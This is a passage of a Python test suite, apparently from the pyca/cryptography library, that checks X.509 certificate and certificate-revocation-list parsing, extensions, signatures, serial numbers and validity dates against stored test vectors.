# Skip extensions
_ = tbs_cert.read_optional_element(CONTEXT_SPECIFIC | CONSTRUCTED | 3)
with validity:
not_before_tag, _ = validity.read_any_element()
not_after_tag, _ = validity.read_any_element()
return ParsedCertificate(
not_before_tag=not_before_tag,
not_after_tag=not_after_tag,
issuer=issuer,
subject=subject,
)
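# A short usage sketch (assumed, not quoted from the original tests): parse a
# DER-encoded certificate and assert which time encoding its validity dates
# were written with, e.g.
#
#     parsed = _parse_cert(cert.public_bytes(serialization.Encoding.DER))
#     assert parsed.not_before_tag == UTC_TIME
#     assert parsed.not_after_tag == GENERALIZED_TIME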
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestCertificateRevocationList(object):
def test_load_pem_crl(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert isinstance(crl, x509.CertificateRevocationList)
fingerprint = binascii.hexlify(crl.fingerprint(hashes.SHA1()))
assert fingerprint == b"3234b0cb4c0cedf6423724b736729dcfc9e441ef"
assert isinstance(crl.signature_hash_algorithm, hashes.SHA256)
assert (
crl.signature_algorithm_oid ==
SignatureAlgorithmOID.RSA_WITH_SHA256
)
def test_load_der_crl(self, backend):
crl = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
assert isinstance(crl, x509.CertificateRevocationList)
fingerprint = binascii.hexlify(crl.fingerprint(hashes.SHA1()))
assert fingerprint == b"dd3db63c50f4c4a13e090f14053227cb1011a5ad"
assert isinstance(crl.signature_hash_algorithm, hashes.SHA256)
def test_invalid_pem(self, backend):
with pytest.raises(ValueError):
x509.load_pem_x509_crl(b"notacrl", backend)
def test_invalid_der(self, backend):
with pytest.raises(ValueError):
x509.load_der_x509_crl(b"notacrl", backend)
def test_unknown_signature_algorithm(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_md2_unknown_crit_entry_ext.pem"
),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(UnsupportedAlgorithm):
crl.signature_hash_algorithm()
def test_issuer(self, backend):
crl = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
assert isinstance(crl.issuer, x509.Name)
assert list(crl.issuer) == [
x509.NameAttribute(x509.OID_COUNTRY_NAME, u'US'),
x509.NameAttribute(
x509.OID_ORGANIZATION_NAME, u'Test Certificates 2011'
),
x509.NameAttribute(x509.OID_COMMON_NAME, u'Good CA')
]
assert crl.issuer.get_attributes_for_oid(x509.OID_COMMON_NAME) == [
x509.NameAttribute(x509.OID_COMMON_NAME, u'Good CA')
]
def test_equality(self, backend):
crl1 = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
crl2 = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
crl3 = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert crl1 == crl2
assert crl1 != crl3
assert crl1 != object()
def test_update_dates(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert isinstance(crl.next_update, datetime.datetime)
assert isinstance(crl.last_update, datetime.datetime)
assert crl.next_update.isoformat() == "2016-01-01T00:00:00"
assert crl.last_update.isoformat() == "2015-01-01T00:00:00"
def test_revoked_cert_retrieval(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
for r in crl:
assert isinstance(r, x509.RevokedCertificate)
# Check that len() works for CRLs.
assert len(crl) == 12
def test_get_revoked_certificate_by_serial_number(self, backend):
crl = _load_cert(
os.path.join(
"x509", "PKITS_data", "crls", "LongSerialNumberCACRL.crl"),
x509.load_der_x509_crl,
backend
)
serial_number = 725064303890588110203033396814564464046290047507
revoked = crl.get_revoked_certificate_by_serial_number(serial_number)
assert revoked.serial_number == serial_number
assert crl.get_revoked_certificate_by_serial_number(500) is None
def test_revoked_cert_retrieval_retain_only_revoked(self, backend):
"""
This test attempts to trigger the crash condition described in
https://github.com/pyca/cryptography/issues/2557
PyPy does gc at its own pace, so it will only be reliable on CPython.
"""
revoked = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)[11]
assert revoked.revocation_date == datetime.datetime(2015, 1, 1, 0, 0)
assert revoked.serial_number == 11
def test_extensions(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_ian_aia_aki.pem"),
x509.load_pem_x509_crl,
backend
)
crl_number = crl.extensions.get_extension_for_oid(
ExtensionOID.CRL_NUMBER
)
aki = crl.extensions.get_extension_for_class(
x509.AuthorityKeyIdentifier
)
aia = crl.extensions.get_extension_for_class(
x509.AuthorityInformationAccess
)
ian = crl.extensions.get_extension_for_class(
x509.IssuerAlternativeName
)
assert crl_number.value == x509.CRLNumber(1)
assert crl_number.critical is False
assert aki.value == x509.AuthorityKeyIdentifier(
key_identifier=(
b'yu\xbb\x84:\xcb,\xdez\t\xbe1\x1bC\xbc\x1c*MSX'
),
authority_cert_issuer=None,
authority_cert_serial_number=None
)
assert aia.value == x509.AuthorityInformationAccess([
x509.AccessDescription(
AuthorityInformationAccessOID.CA_ISSUERS,
x509.DNSName(u"cryptography.io")
)
])
assert ian.value == x509.IssuerAlternativeName([
x509.UniformResourceIdentifier(u"https://cryptography.io"),
])
def test_delta_crl_indicator(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_delta_crl_indicator.pem"),
x509.load_pem_x509_crl,
backend
)
dci = crl.extensions.get_extension_for_oid(
ExtensionOID.DELTA_CRL_INDICATOR
)
assert dci.value == x509.DeltaCRLIndicator(12345678901234567890)
assert dci.critical is False
def test_signature(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
assert crl.signature == binascii.unhexlify(
b"536a5a0794f68267361e7bc2f19167a3e667a2ab141535616855d8deb2ba1af"
b"9fd4546b1fe76b454eb436af7b28229fedff4634dfc9dd92254266219ae0ea8"
b"75d9ff972e9a2da23d5945f073da18c50a4265bfed9ca16586347800ef49dd1"
b"6856d7265f4f3c498a57f04dc04404e2bd2e2ada1f5697057aacef779a18371"
b"c621edc9a5c2b8ec1716e8fa22feeb7fcec0ce9156c8d344aa6ae8d1a5d99d0"
b"9386df36307df3b63c83908f4a61a0ff604c1e292ad63b349d1082ddd7ae1b7"
b"c178bba995523ec6999310c54da5706549797bfb1230f5593ba7b4353dade4f"
b"d2be13a57580a6eb20b5c4083f000abac3bf32cd8b75f23e4c8f4b3a79e1e2d"
b"58a472b0"
)
def test_tbs_certlist_bytes(self, backend):
crl = _load_cert(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
backend
)
ca_cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
ca_cert.public_key().verify(
crl.signature, crl.tbs_certlist_bytes,
padding.PKCS1v15(), crl.signature_hash_algorithm
)
def test_public_bytes_pem(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_empty.pem"),
x509.load_pem_x509_crl,
backend
)
# Encode it to PEM and load it back.
crl = x509.load_pem_x509_crl(crl.public_bytes(
encoding=serialization.Encoding.PEM,
), backend)
assert len(crl) == 0
assert crl.last_update == datetime.datetime(2015, 12, 20, 23, 44, 47)
assert crl.next_update == datetime.datetime(2015, 12, 28, 0, 44, 47)
def test_public_bytes_der(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
# Encode it to DER and load it back.
crl = x509.load_der_x509_crl(crl.public_bytes(
encoding=serialization.Encoding.DER,
), backend)
assert len(crl) == 12
assert crl.last_update == datetime.datetime(2015, 1, 1, 0, 0, 0)
assert crl.next_update == datetime.datetime(2016, 1, 1, 0, 0, 0)
@pytest.mark.parametrize(
("cert_path", "loader_func", "encoding"),
[
(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
serialization.Encoding.PEM,
),
(
os.path.join("x509", "PKITS_data", "crls", "GoodCACRL.crl"),
x509.load_der_x509_crl,
serialization.Encoding.DER,
),
]
)
def test_public_bytes_match(self, cert_path, loader_func, encoding,
backend):
crl_bytes = load_vectors_from_file(
cert_path, lambda pemfile: pemfile.read(), mode="rb"
)
crl = loader_func(crl_bytes, backend)
serialized = crl.public_bytes(encoding)
assert serialized == crl_bytes
def test_public_bytes_invalid_encoding(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_empty.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(TypeError):
crl.public_bytes('NotAnEncoding')
def test_verify_bad(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "invalid_signature.pem"),
x509.load_pem_x509_crl,
backend
)
crt = _load_cert(
os.path.join("x509", "custom", "invalid_signature.pem"),
x509.load_pem_x509_certificate,
backend
)
assert not crl.is_signature_valid(crt.public_key())
def test_verify_good(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "valid_signature.pem"),
x509.load_pem_x509_crl,
backend
)
crt = _load_cert(
os.path.join("x509", "custom", "valid_signature.pem"),
x509.load_pem_x509_certificate,
backend
)
assert crl.is_signature_valid(crt.public_key())
def test_verify_argument_must_be_a_public_key(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "valid_signature.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(TypeError):
crl.is_signature_valid("not a public key")
with pytest.raises(TypeError):
crl.is_signature_valid(object)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRevokedCertificate(object):
def test_revoked_basics(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
for i, rev in enumerate(crl):
assert isinstance(rev, x509.RevokedCertificate)
assert isinstance(rev.serial_number, int)
assert isinstance(rev.revocation_date, datetime.datetime)
assert isinstance(rev.extensions, x509.Extensions)
assert rev.serial_number == i
assert rev.revocation_date.isoformat() == "2015-01-01T00:00:00"
def test_revoked_extensions(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
exp_issuer = [
x509.DirectoryName(x509.Name([
x509.NameAttribute(x509.OID_COUNTRY_NAME, u"US"),
x509.NameAttribute(x509.OID_COMMON_NAME, u"cryptography.io"),
]))
]
# The first revoked cert doesn't have extensions; check that this is
# handled correctly.
rev0 = crl[0]
# It should return an empty Extensions object.
assert isinstance(rev0.extensions, x509.Extensions)
assert len(rev0.extensions) == 0
with pytest.raises(x509.ExtensionNotFound):
rev0.extensions.get_extension_for_oid(x509.OID_CRL_REASON)
with pytest.raises(x509.ExtensionNotFound):
rev0.extensions.get_extension_for_oid(x509.OID_CERTIFICATE_ISSUER)
with pytest.raises(x509.ExtensionNotFound):
rev0.extensions.get_extension_for_oid(x509.OID_INVALIDITY_DATE)
# Test manual retrieval of extension values.
rev1 = crl[1]
assert isinstance(rev1.extensions, x509.Extensions)
reason = rev1.extensions.get_extension_for_class(
x509.CRLReason).value
assert reason == x509.CRLReason(x509.ReasonFlags.unspecified)
issuer = rev1.extensions.get_extension_for_class(
x509.CertificateIssuer).value
assert issuer == x509.CertificateIssuer(exp_issuer)
date = rev1.extensions.get_extension_for_class(
x509.InvalidityDate).value
assert date == x509.InvalidityDate(datetime.datetime(2015, 1, 1, 0, 0))
# Check if all reason flags can be found in the CRL.
flags = set(x509.ReasonFlags)
for rev in crl:
try:
r = rev.extensions.get_extension_for_class(x509.CRLReason)
except x509.ExtensionNotFound:
# Not all revoked certs have a reason extension.
pass
else:
flags.discard(r.value.reason)
assert len(flags) == 0
def test_no_revoked_certs(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_empty.pem"),
x509.load_pem_x509_crl,
backend
)
assert len(crl) == 0
def test_duplicate_entry_ext(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_dup_entry_ext.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(x509.DuplicateExtension):
crl[0].extensions
def test_unsupported_crit_entry_ext(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_md2_unknown_crit_entry_ext.pem"
),
x509.load_pem_x509_crl,
backend
)
ext = crl[0].extensions.get_extension_for_oid(
x509.ObjectIdentifier("1.2.3.4")
)
assert ext.value.value == b"\n\x01\x00"
def test_unsupported_reason(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_unsupported_reason.pem"
),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(ValueError):
crl[0].extensions
def test_invalid_cert_issuer_ext(self, backend):
crl = _load_cert(
os.path.join(
"x509", "custom", "crl_inval_cert_issuer_entry_ext.pem"
),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(ValueError):
crl[0].extensions
def test_indexing(self, backend):
crl = _load_cert(
os.path.join("x509", "custom", "crl_all_reasons.pem"),
x509.load_pem_x509_crl,
backend
)
with pytest.raises(IndexError):
crl[-13]
with pytest.raises(IndexError):
crl[12]
assert crl[-1].serial_number == crl[11].serial_number
assert len(crl[2:4]) == 2
assert crl[2:4][0].serial_number == crl[2].serial_number
assert crl[2:4][1].serial_number == crl[3].serial_number
def test_get_revoked_certificate_doesnt_reorder(self, backend):
private_key = RSA_KEY_2048.private_key(backend)
last_update = datetime.datetime(2002, 1, 1, 12, 1)
next_update = datetime.datetime(2030, 1, 1, 12, 1)
builder = x509.CertificateRevocationListBuilder().issuer_name(
x509.Name([
x509.NameAttribute(NameOID.COMMON_NAME, u"cryptography.io CA")
])
).last_update(
last_update
).next_update(
next_update
)
for i in [2, 500, 3, 49, 7, 1]:
revoked_cert = x509.RevokedCertificateBuilder().serial_number(
i
).revocation_date(
datetime.datetime(2012, 1, 1, 1, 1)
).build(backend)
builder = builder.add_revoked_certificate(revoked_cert)
crl = builder.sign(private_key, hashes.SHA256(), backend)
assert crl[0].serial_number == 2
assert crl[2].serial_number == 3
# make sure get_revoked_certificate_by_serial_number doesn't affect
# ordering after being invoked
crl.get_revoked_certificate_by_serial_number(500)
assert crl[0].serial_number == 2
assert crl[2].serial_number == 3
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSACertificate(object):
def test_load_pem_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 11559813051657483483
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"2b619ed04bfc9c3b08eb677d272192286a0947a8"
assert isinstance(cert.signature_hash_algorithm, hashes.SHA1)
assert (
cert.signature_algorithm_oid == SignatureAlgorithmOID.RSA_WITH_SHA1
)
def test_negative_serial_number(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "negative_serial.pem"),
x509.load_pem_x509_certificate,
backend,
)
assert cert.serial_number == -18008675309
def test_alternate_rsa_with_sha1_oid(self, backend):
cert = _load_cert(
os.path.join("x509", "alternate-rsa-sha1-oid.pem"),
x509.load_pem_x509_certificate,
backend
)
assert isinstance(cert.signature_hash_algorithm, hashes.SHA1)
assert (
cert.signature_algorithm_oid ==
SignatureAlgorithmOID._RSA_WITH_SHA1
)
def test_load_der_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
assert isinstance(cert, x509.Certificate)
assert cert.serial_number == 2
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
assert isinstance(cert.signature_hash_algorithm, hashes.SHA256)
def test_signature(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.signature == binascii.unhexlify(
b"8e0f72fcbebe4755abcaf76c8ce0bae17cde4db16291638e1b1ce04a93cdb4c"
b"44a3486070986c5a880c14fdf8497e7d289b2630ccb21d24a3d1aa1b2d87482"
b"07f3a1e16ccdf8daa8a7ea1a33d49774f513edf09270bd8e665b6300a10f003"
b"66a59076905eb63cf10a81a0ca78a6ef3127f6cb2f6fb7f947fce22a30d8004"
b"8c243ba2c1a54c425fe12310e8a737638f4920354d4cce25cbd9dea25e6a2fe"
b"0d8579a5c8d929b9275be221975479f3f75075bcacf09526523b5fd67f7683f"
b"3cda420fabb1e9e6fc26bc0649cf61bb051d6932fac37066bb16f55903dfe78"
b"53dc5e505e2a10fbba4f9e93a0d3b53b7fa34b05d7ba6eef869bfc34b8e514f"
b"d5419f75"
)
assert len(cert.signature) == cert.public_key().key_size // 8
def test_tbs_certificate_bytes(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.tbs_certificate_bytes == binascii.unhexlify(
b"308202d8a003020102020900a06cb4b955f7f4db300d06092a864886f70d010"
b"10505003058310b3009060355040613024155311330110603550408130a536f"
b"6d652d53746174653121301f060355040a1318496e7465726e6574205769646"
b"769747320507479204c74643111300f0603550403130848656c6c6f20434130"
b"1e170d3134313132363231343132305a170d3134313232363231343132305a3"
b"058310b3009060355040613024155311330110603550408130a536f6d652d53"
b"746174653121301f060355040a1318496e7465726e657420576964676974732"
b"0507479204c74643111300f0603550403130848656c6c6f2043413082012230"
b"0d06092a864886f70d01010105000382010f003082010a0282010100b03af70"
b"2059e27f1e2284b56bbb26c039153bf81f295b73a49132990645ede4d2da0a9"
b"13c42e7d38d3589a00d3940d194f6e6d877c2ef812da22a275e83d8be786467"
b"48b4e7f23d10e873fd72f57a13dec732fc56ab138b1bb308399bb412cd73921"
b"4ef714e1976e09603405e2556299a05522510ac4574db5e9cb2cf5f99e8f48c"
b"1696ab3ea2d6d2ddab7d4e1b317188b76a572977f6ece0a4ad396f0150e7d8b"
b"1a9986c0cb90527ec26ca56e2914c270d2a198b632fa8a2fda55079d3d39864"
b"b6fb96ddbe331cacb3cb8783a8494ccccd886a3525078847ca01ca5f803e892"
b"14403e8a4b5499539c0b86f7a0daa45b204a8e079d8a5b03db7ba1ba3d7011a"
b"70203010001a381bc3081b9301d0603551d0e04160414d8e89dc777e4472656"
b"f1864695a9f66b7b0400ae3081890603551d23048181307f8014d8e89dc777e"
b"4472656f1864695a9f66b7b0400aea15ca45a3058310b300906035504061302"
b"4155311330110603550408130a536f6d652d53746174653121301f060355040"
b"a1318496e7465726e6574205769646769747320507479204c74643111300f06"
b"03550403130848656c6c6f204341820900a06cb4b955f7f4db300c0603551d1"
b"3040530030101ff"
)
cert.public_key().verify(
cert.signature, cert.tbs_certificate_bytes,
padding.PKCS1v15(), cert.signature_hash_algorithm
)
def test_issuer(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Validpre2000UTCnotBeforeDateTest3EE.crt"
),
x509.load_der_x509_certificate,
backend
)
issuer = cert.issuer
assert isinstance(issuer, x509.Name)
assert list(issuer) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u'Test Certificates 2011'
),
x509.NameAttribute(NameOID.COMMON_NAME, u'Good CA')
]
assert issuer.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(NameOID.COMMON_NAME, u'Good CA')
]
def test_all_issuer_name_types(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom",
"all_supported_names.pem"
),
x509.load_pem_x509_certificate,
backend
)
issuer = cert.issuer
assert isinstance(issuer, x509.Name)
assert list(issuer) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'CA'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Texas'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'Illinois'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Chicago'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Austin'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'Zero, LLC'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'One, LLC'),
x509.NameAttribute(NameOID.COMMON_NAME, u'common name 0'),
x509.NameAttribute(NameOID.COMMON_NAME, u'common name 1'),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u'OU 0'),
x509.NameAttribute(NameOID.ORGANIZATIONAL_UNIT_NAME, u'OU 1'),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'dnQualifier0'),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'dnQualifier1'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'123'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'456'),
x509.NameAttribute(NameOID.TITLE, u'Title 0'),
x509.NameAttribute(NameOID.TITLE, u'Title 1'),
x509.NameAttribute(NameOID.SURNAME, u'Surname 0'),
x509.NameAttribute(NameOID.SURNAME, u'Surname 1'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'Given Name 0'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'Given Name 1'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Incognito 0'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Incognito 1'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'Last Gen'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'Next Gen'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc0'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc1'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test0@test.local'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test1@test.local'),
]
def test_subject(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Validpre2000UTCnotBeforeDateTest3EE.crt"
),
x509.load_der_x509_certificate,
backend
)
subject = cert.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'US'),
x509.NameAttribute(
NameOID.ORGANIZATION_NAME, u'Test Certificates 2011'
),
x509.NameAttribute(
NameOID.COMMON_NAME,
u'Valid pre2000 UTC notBefore Date EE Certificate Test3'
)
]
assert subject.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(
NameOID.COMMON_NAME,
u'Valid pre2000 UTC notBefore Date EE Certificate Test3'
)
]
def test_unicode_name(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom",
"utf8_common_name.pem"
),
x509.load_pem_x509_certificate,
backend
)
assert cert.subject.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(
NameOID.COMMON_NAME,
u'We heart UTF8!\u2122'
)
]
assert cert.issuer.get_attributes_for_oid(NameOID.COMMON_NAME) == [
x509.NameAttribute(
NameOID.COMMON_NAME,
u'We heart UTF8!\u2122'
)
]
def test_non_ascii_dns_name(self, backend):
cert = _load_cert(
os.path.join("x509", "utf8-dnsname.pem"),
x509.load_pem_x509_certificate,
backend
)
san = cert.extensions.get_extension_for_class(
x509.SubjectAlternativeName
).value
names = san.get_values_for_type(x509.DNSName)
assert names == [
u'partner.biztositas.hu', u'biztositas.hu', u'*.biztositas.hu',
u'biztos\xedt\xe1s.hu', u'*.biztos\xedt\xe1s.hu',
u'xn--biztosts-fza2j.hu', u'*.xn--biztosts-fza2j.hu'
]
def test_all_subject_name_types(self, backend):
cert = _load_cert(
os.path.join(
"x509", "custom",
"all_supported_names.pem"
),
x509.load_pem_x509_certificate,
backend
)
subject = cert.subject
assert isinstance(subject, x509.Name)
assert list(subject) == [
x509.NameAttribute(NameOID.COUNTRY_NAME, u'AU'),
x509.NameAttribute(NameOID.COUNTRY_NAME, u'DE'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'California'),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u'New York'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'San Francisco'),
x509.NameAttribute(NameOID.LOCALITY_NAME, u'Ithaca'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'Org Zero, LLC'),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u'Org One, LLC'),
x509.NameAttribute(NameOID.COMMON_NAME, u'CN 0'),
x509.NameAttribute(NameOID.COMMON_NAME, u'CN 1'),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME, u'Engineering 0'
),
x509.NameAttribute(
NameOID.ORGANIZATIONAL_UNIT_NAME, u'Engineering 1'
),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'qualified0'),
x509.NameAttribute(NameOID.DN_QUALIFIER, u'qualified1'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'789'),
x509.NameAttribute(NameOID.SERIAL_NUMBER, u'012'),
x509.NameAttribute(NameOID.TITLE, u'Title IX'),
x509.NameAttribute(NameOID.TITLE, u'Title X'),
x509.NameAttribute(NameOID.SURNAME, u'Last 0'),
x509.NameAttribute(NameOID.SURNAME, u'Last 1'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'First 0'),
x509.NameAttribute(NameOID.GIVEN_NAME, u'First 1'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Guy Incognito 0'),
x509.NameAttribute(NameOID.PSEUDONYM, u'Guy Incognito 1'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'32X'),
x509.NameAttribute(NameOID.GENERATION_QUALIFIER, u'Dreamcast'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc2'),
x509.NameAttribute(NameOID.DOMAIN_COMPONENT, u'dc3'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test2@test.local'),
x509.NameAttribute(NameOID.EMAIL_ADDRESS, u'test3@test.local'),
]
def test_load_good_ca_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "PKITS_data", "certs", "GoodCACert.crt"),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.serial_number == 2
public_key = cert.public_key()
assert isinstance(public_key, rsa.RSAPublicKey)
assert cert.version is x509.Version.v3
fingerprint = binascii.hexlify(cert.fingerprint(hashes.SHA1()))
assert fingerprint == b"6f49779533d565e8b7c1062503eab41492c38e4d"
def test_utc_pre_2000_not_before_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Validpre2000UTCnotBeforeDateTest3EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(1950, 1, 1, 12, 1)
def test_pre_2000_utc_not_after_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"Invalidpre2000UTCEEnotAfterDateTest7EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_after == datetime.datetime(1999, 1, 1, 12, 1)
def test_post_2000_utc_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(
2014, 11, 26, 21, 41, 20
)
assert cert.not_valid_after == datetime.datetime(
2014, 12, 26, 21, 41, 20
)
def test_generalized_time_not_before_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotBeforeDateTest4EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(2002, 1, 1, 12, 1)
assert cert.not_valid_after == datetime.datetime(2030, 12, 31, 8, 30)
assert cert.version is x509.Version.v3
def test_generalized_time_not_after_cert(self, backend):
cert = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotAfterDateTest8EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert.not_valid_before == datetime.datetime(2010, 1, 1, 8, 30)
assert cert.not_valid_after == datetime.datetime(2050, 1, 1, 12, 1)
assert cert.version is x509.Version.v3
def test_invalid_version_cert(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "invalid_version.pem"),
x509.load_pem_x509_certificate,
backend
)
with pytest.raises(x509.InvalidVersion) as exc:
cert.version
assert exc.value.parsed_version == 7
def test_eq(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert2 = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
assert cert == cert2
def test_ne(self, backend):
cert = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert2 = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotAfterDateTest8EE.crt"
),
x509.load_der_x509_certificate,
backend
)
assert cert != cert2
assert cert != object()
def test_hash(self, backend):
cert1 = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert2 = _load_cert(
os.path.join("x509", "custom", "post2000utctime.pem"),
x509.load_pem_x509_certificate,
backend
)
cert3 = _load_cert(
os.path.join(
"x509", "PKITS_data", "certs",
"ValidGeneralizedTimenotAfterDateTest8EE.crt"
),
x509.load_der_x509_certificate,
backend
)
